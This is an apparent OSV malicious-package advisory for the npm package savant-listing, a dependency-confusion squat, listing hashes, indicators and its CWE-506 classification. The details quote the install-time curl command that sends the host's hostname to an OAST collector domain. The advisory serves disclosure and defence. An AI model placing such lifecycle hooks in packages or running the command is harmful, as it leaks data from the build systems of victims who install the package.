MAL-2026-5401
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5401
- Published
- 2026-06-09T16:05:25Z
- Modified
- 2026-06-09T17:16:27.775347350Z
- Summary
- Malicious code in savant-listing (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461)
savant-listing@999.9.9 is a dependency-confusion squat. package.json declares both
installandpostinstalllifecycle scripts that runcurl https://d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online/info/?hostname=$(hostname), unconditionally exfiltrating the installer host's hostname to an out-of-band interaction (OAST/interactsh) collector on everynpm install. The version999.9.9and descriptionSAFE PoC - Demonstrates dependency confusionare consistent with a package published to the public registry to win version resolution over an internal package of the same name on victim build systems. The destination is a transient, attacker-controlled OAST subdomain not associated with any legitimate publisher; the harm fires automatically at install time without any user interaction. - Database specific
{ "malicious-packages-origins": [ { "modified_time": "2026-06-09T16:06:10Z", "versions": [ "999.9.10" ], "sha256": "2d6b7c657fc5ab0647f053b2eea71bebc1d720e7a70abf0316323af2a9d849aa", "id": "IN-MAL-2026-004961", "source": "amazon-inspector", "import_time": "2026-06-09T16:59:44.63530747Z" }, { "modified_time": "2026-06-09T16:05:25Z", "versions": [ "999.9.9" ], "sha256": "518fb2425e398b68afc0ced11b5ccf24fbcab3aae9c831b1a34a830c941f5963", "id": "IN-MAL-2026-004956", "source": "amazon-inspector", "import_time": "2026-06-09T16:59:44.341667267Z" }, { "modified_time": "2026-06-09T16:05:25Z", "versions": [ "999.9.9" ], "sha256": "7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461", "id": "IN-MAL-2026-004955", "source": "amazon-inspector", "import_time": "2026-06-09T16:59:44.240310521Z" }, { "import_time": "2026-06-09T16:59:44.695269124Z", "versions": [ "999.9.10" ], "sha256": "972304a7ce9c3b67c976d03f4c2769d33ec68e2ff01b358a8ab374793c7ce078", "id": "IN-MAL-2026-004962", "source": "amazon-inspector", "modified_time": "2026-06-09T16:06:10Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / savant-listing
Package
- Name
- savant-listing
- View open source insights on deps.dev
- Purl
- pkg:npm/savant-listing
Database specific
indicators
{
"domains": [
"d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online"
],
"evidence_files": [
{
"sha256": "a4c0237994ad97ad0dab04882a231e78076c22632c9f04b395a1f2943decd18a",
"tlsh": "abe0617045108e3336d802a17c66950f9852fb2b041d9c544feb154d971d336117d317",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-ekMuvz54s6MjpQOMjogc55GS8OiQ/ZLo9E+siMG9vJi31LzICYyCwLV7XhUxaYuufkIkHgKrjr93YdVuiu7KyQ==",
"sha1": "80788d649ee21b6a0bd0fd9d536f0bc3fa1d9b96"
},
"filename": "savant-listing-999.9.10.tgz"
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json"